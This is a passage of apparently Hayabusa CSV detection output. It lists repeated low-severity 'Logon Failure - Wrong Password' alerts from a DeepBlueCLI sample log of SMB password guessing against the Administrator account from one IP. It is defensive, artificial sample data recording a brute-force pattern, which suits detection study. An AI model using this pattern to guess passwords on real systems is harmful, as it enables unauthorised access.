NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QMoQWddkcYtCmoKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jhTbfX42Pwn7OA2k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXcbUCgAhVFfqLc3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GHyXVM0jpaKBiY9N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TZoWEcU6VbEnrLpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LIfEzNQWwvrai4ga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DhImfqWz7SHId9hE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6sekQfneNE5uFtx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iEQ6KkZEHGcSgdA8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qzxJYBbM7ZMaaGOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wO5GFBqSltNfjtQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PdsMzjfP1ZcPju2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LqpKmoCX9slPXie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ouHvw1LXTN3OSFYb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tZIB1QO7hfugceJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4QU2BQ0u5tJsdjG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0P7NKiKCmLvu6L1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4obkK4RfsLZe5gdi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRUDpDLhgop8d1el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LvdsNkFqfFWRePXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wvd8c1jYrEZMcKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AWvECxgkvWdg9Zdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHHPOAYSMSp3BhX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rJicXUMfrx9BOzHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eybrQWvrvwSkNADJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VVMPCaQB0XteDSwC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lbjjLoATZE6KPIQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tips954DRcYeIB2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nLe9aMiMz0akxfWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: csroGB9KZOZkb5sY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Zl4Rc25RsvJ7Y9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5CxqCFOIJBMZCD6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gVPwxpR05F3B5aXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nP317UkK2DhTD5Rd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ir3c7dqXm1LhbfqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1U1QZiJSrEufxF3b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HZnDnDhTPuC9n5A1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72gY1ClzwuisAhKW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nrneLGOZCwPIeQgT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm3gGV2yR4B3yrJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fzeklLG1KCTE5FpP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZPwxCw3EWy9NShk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MalB3OcsOsRaMtS3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XMZMqCYPHO3n4RIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1VUeIuU1rQPISNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: md4ioB8wNiaz2EKB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nM8QaFeqwDfJZ1gc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlR75rMhpLnfQZbC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8BcOe4YUDYTXkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FK0Iiao20PyPmtTk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kQbCbAHrQilFmMZP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VUdXQOw98VVoksDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fISqpC8eKlaQGabv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s5Y0VryMAHjtB3n2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsjAHlztFIC8tBt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiEQlAlTOhqOKpmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i7lUqZMROQXNUtQm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0eFCGEtOLzjUxI5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CqfOAGcVcwSgaeo3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hcqVJzkVgvUnebk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9ZpqiTGXqJlAQTZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qCzXKlJ2vPeqqdfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tITW0ihpErFk3nKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MdQqr1T4frPNlulf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: niiXRpP5AVHpG9Hu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EThR98jZUdwNxbXQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBsJcIw859FfEkLD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kG4Tv5vauSWhbj8F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 453tjgRGMu46vC33 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fnzhhfszxJWxLCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWPkeL8TnAbC1nSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JrDmUzyK4Xxx6Jn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMTf9D2yjumfS9LM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cCs65ithseTCORa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBrGAScjpAdScGmJ | IP Addr: 192.168.198.149 | AuthPackage: 